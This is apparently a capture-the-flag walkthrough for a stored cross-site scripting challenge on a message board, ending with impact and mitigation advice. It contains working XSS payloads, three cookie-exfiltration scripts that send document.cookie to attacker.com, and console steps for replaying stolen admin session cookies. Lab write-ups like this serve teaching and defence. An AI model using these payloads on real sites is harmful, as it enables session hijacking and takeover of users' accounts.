This challenge implements a stored XSS vulnerability with a unique twist: when your payload contains document.cookie, the application automatically replaces it with admin cookie values to simulate an admin visiting your malicious message. The key is to steal these replaced admin cookies to gain access to the admin panel.

1. Access the application: Navigate to <target-ip> to access the community message board
2. Explore functionality: Test posting normal messages to understand the interface
3. Notice admin monitoring: Observe the admin notice indicating the board is monitored
4. Test for admin endpoints: Try accessing <target-ip>/admin (access denied without privileges)

1. Basic XSS test: Post a simple alert to confirm the vulnerability

Name: Test
Message: <script>alert('XSS Confirmed')</script>

2. Verify stored XSS: Refresh the page to confirm the script executes again
3. Alternative payload formats: If script tags don't work, try:

<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

Challenge-Specific Approach (Simplified)

1. Simple cookie theft payload: Since this challenge simulates admin visits, we can use a basic alert

<script>
// The application will replace document.cookie with admin cookies
var stolenCookies = document.cookie;
// Display the stolen admin cookies
alert('Stolen admin cookies: ' + stolenCookies);
</script>

2. Post the payload: Submit this message through the message board
3. Extract cookie values: When the page loads, you'll see an alert with the admin cookies
4. Copy the cookie values: Note down the admin session tokens from the alert

Real-World Cookie Stealing (Educational)

In actual attacks, you cannot see the admin's cookies directly. Instead, you must:

1. Set up a collection server: Host a server to receive stolen cookies
2. Plant the payload: Inject XSS that sends cookies to your server
3. Wait for admin visit: The admin must actually visit the compromised page
4. Collect the data: Receive stolen cookies on your server

// Method 1: Image-based exfiltration
<script>
var cookies = document.cookie;
var img = new Image();
img.src = 'http://attacker.com/steal?data=' + encodeURIComponent(cookies);
</script>

// Method 2: Fetch API exfiltration
<script>
fetch('http://attacker.com/steal', {
    method: 'POST',
    body: 'cookies=' + encodeURIComponent(document.cookie)
});
</script>

// Method 3: Form submission exfiltration
<script>
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://attacker.com/steal';
var input = document.createElement('input');
input.name = 'stolen_cookies';
input.value = document.cookie;
form.appendChild(input);
document.body.appendChild(form);
form.submit();
</script>

1. Manual cookie setting: Use browser developer tools to set the stolen cookies
2. Open Developer Console: Press F12 and go to the Console tab
3. Set admin cookies: Paste the following command with the stolen cookie values:

// Replace with actual cookie values from Step 3
document.cookie = 'admin_session=true; path=/;';
document.cookie = 'admin_session_token_[64-hex-value]=active; path=/;';
document.cookie = 'sessionid=admin_12345; path=/;';

4. Access admin panel: Navigate to <target-ip>/admin
5. Retrieve the flag: The flag is displayed prominently in the admin panel

1. Server-side replacement: The application searches for 'document.cookie' in messages (case-insensitive)
2. Automatic substitution: When found, it replaces the text with realistic admin cookie values
3. Cookie format: Includes multiple admin authentication tokens
4. Real-world simulation: This demonstrates what happens when an admin visits a compromised page

// Example stolen cookie format:
admin_session=true; admin_session_token_[64-hex]=active; sessionid=admin_12345

• Vulnerability type: Stored Cross-Site Scripting (XSS) with cookie theft
• Root cause: Direct HTML insertion without sanitization in message rendering
• Attack method: Cookie theft through XSS payload execution
• Simulation feature: Automatic document.cookie replacement simulates admin interaction
• Attack vector: Message posting form with no input validation
• Educational value: Demonstrates session hijacking through XSS

• Session hijacking: XSS enables attackers to steal authentication cookies and session tokens
• Privilege escalation: Stolen admin cookies grant unauthorized access to administrative functions
• Data theft: Admin access allows retrieval of sensitive information and flags
• Persistent threat: Stored XSS affects all users who view the compromised content
• Account takeover: Complete compromise of admin accounts through cookie theft

• Input sanitization: HTML-encode all user input before storage and display
• Output encoding: Use proper HTML entity encoding for dynamic content
• Content Security Policy: Implement strict CSP headers to prevent inline scripts
• HTTPOnly cookies: Mark session cookies as HTTPOnly to prevent script access
• Secure cookies: Use Secure flag for cookies in HTTPS environments
• Input validation: Whitelist allowed HTML tags and attributes
• Regular testing: Include XSS testing in security assessment procedures